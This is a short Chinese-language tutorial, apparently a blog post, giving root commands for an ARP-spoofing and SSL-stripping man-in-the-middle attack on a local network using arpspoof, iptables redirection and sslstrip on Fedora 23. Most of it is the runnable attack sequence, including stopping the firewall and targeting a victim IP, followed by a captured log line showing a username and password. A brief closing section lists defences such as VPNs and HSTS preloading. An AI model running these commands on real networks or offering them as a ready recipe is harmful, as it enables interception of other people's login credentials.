今天讲的是通过ARP欺骗达到欺骗受害者,剥离SSL,使用明文传输。所有都在Fedora 23下进行。仅针对LAN局域网内。
攻击
以下所有命令均在root权限下执行。
1. 安装一些攻击程序
dnf install dsniff sslstrip
2. 开启内核端口转发
echo 1 > /proc/sys/net/ipv4/ip_forward
3. 增加防火墙规则,允许端口转发
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
4. 获取网关地址
route -n
找到目的地为0.0.0.0的网关地址。在此假设192.168.0.1。
5. 需要临时关闭攻击者的firewalld防火墙
systemctl stop firewalld
6. 利用arpspoof欺骗目标电脑
arpspoof -i eth0 -t 192.168.0.9 -r 192.168.0.1
保留这个窗口
7. 利用sslstrip记录流量信息
sslstrip -l 8080 -w /tmp/log 2>/dev/null
所有的记录下的东西都在/tmp/log下。
2016-05-29 17:13:57,466 SECURE POST Data (www.example.com): csrfmiddlewaretoken=kOPN0PQowziOgkiFXhl5OjZLwcxXbCJk&username=ddd&password=ddd
看见这个username和password了有木有!
防范
参考上一篇文章,这是针对ARP的防范部分。
使用VPN也是一个不错的办法。
另外一个需要注意的就是使用最新的浏览器,带HSTS preloading list的,比如Chrome。
不随便在非SSL网站上填写密码账号
确认网银等重要网站是通过SSL访问的,总体来说就是养成好的使用习惯。